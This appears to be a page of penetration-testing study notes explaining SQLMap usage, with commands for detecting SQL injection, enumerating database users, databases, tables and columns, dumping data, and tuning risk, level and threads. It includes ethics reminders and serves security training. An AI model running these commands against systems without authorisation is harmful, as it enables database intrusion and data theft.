# 5.4.6 SQLMap

## SQLMap

SQLMap is a powerful open-source penetration testing tool designed to automate the process of detecting and exploiting SQL injection flaws in web applications. It simplifies the identification and exploitation of SQL vulnerabilities, making it a widely used tool in the field of penetration testing.

### **Basic Syntax**

*   **Detecting SQL Injection:** To use SQLMap, provide the tool with the vulnerable URL and the parameter to test for SQL injection. For example:

    ```
    $ sqlmap -u "http://victim.site/view.php?id=1141" -p id --technique=U
    ```

    This command tells SQLMap to test the `id` parameter of a GET request for `view.php` using a Union-based SQL injection technique.
*   **Handling POST Parameters:** If the injection involves a POST parameter, the syntax would be:

    ```
    $ sqlmap -u <URL> --data=<POST string> -p parameter [options]
    ```

    You can write the POST string manually or copy it from a request intercepted with Burp Proxy.
*   **Using Request Files:** Save a request intercepted with Burp Proxy to a file and specify it on the command line:

    ```
    $ sqlmap -r <request file> -p parameter [options]
    ```

### **Extracting Information**

*   **Database Banner:** The `--banner` switch helps in grabbing the database banner to test injection and include proof of exploitability in reports:

    ```
    $ sqlmap -u <target> --banner <other options>
    ```
* **Information Gathering:**
  *   List users of the database:

      ```
      $ sqlmap -u <target> --users <other options>
      ```
  *   Check if the web application database user is a database administrator:

      ```
      $ sqlmap -u <target> --is-dba <other options>
      ```
* **Database and Schema Extraction:**
  *   List all available databases:

      ```
      $ sqlmap -u <target> --dbs <other options>
      ```
  *   Choose a database and list its tables:

      ```
      $ sqlmap -u <target> -D <database> --tables <other options>
      ```
  *   Choose tables and list their columns:

      ```
      $ sqlmap -u <target> -D <database> -T <tables, comma separated list> --columns <other options>
      ```
  *   Dump specific columns:

      ```
      $ sqlmap -u <target> -D <database> -T <tables> -C <columns list> --dump <other options>
      ```

### **SQLMap Advanced Usage**

*   **Forcing the DBMS:** Specify the DBMS to help shorten the detection phase:

    ```
    $ sqlmap --dbms=<DBMS> ...
    ```

    Available DBMS options include MySQL, Oracle, PostgreSQL, Microsoft SQL Server, and more.
*   **Fine-Tuning Payloads:** Use `--string` and `--not-string` to handle changes in application output. For example:

    ```
    $ sqlmap -u 'http://localhost/ecommerce.php?id=1' --string "nokia" <other switches>
    ```

    Utilize `--prefix` and `--suffix` for structured POST parameters.
* **Aggressiveness and Load:**
  * Use `--level` to test headers and increase the number of columns tested for in-band exploitation.
  * Use `--risk` to adjust the aggressiveness of injections. Higher risk levels enable more dangerous injections.
* **Connection Management:**
  *   Use `--keep-alive` for persistent connections:

      ```
      $ sqlmap -u <target> --keep-alive <other commands>
      ```
  *   Use `--threads` to exploit injections with parallel threads:

      ```
      $ sqlmap -u <target> --technique=8 --threads 7 <other commands>
      ```



* SQL Injections are powerful but can be destructive; hence, ethical hacking requires careful consideration.
* Understanding the tools and their options is crucial for successful and responsible penetration testing.
* SQLMap provides advanced command-line switches for fine-tuning and optimizing the exploitation process.
* Always exercise caution to avoid damaging the client's infrastructure and follow ethical hacking practices.

### BurpSuite & SQLMap

A great way to find out if a SQLi vulnerability is present is to use a web proxy such as BurpSuite, capture the traffic, and save the captured file locally (.xml).

We will then open that file with SQLMap and check for vulnerabilities or not.

```bash
sqlmap -r sql_request_captured.xml 
```

{% content-ref url="https://app.gitbook.com/s/iS3hadq7jVFgSa8k5wRA/practical-ethical-hacker-notes/tools/sqlmap" %}
[SQLMap](https://app.gitbook.com/s/iS3hadq7jVFgSa8k5wRA/practical-ethical-hacker-notes/tools/sqlmap)
{% endcontent-ref %}
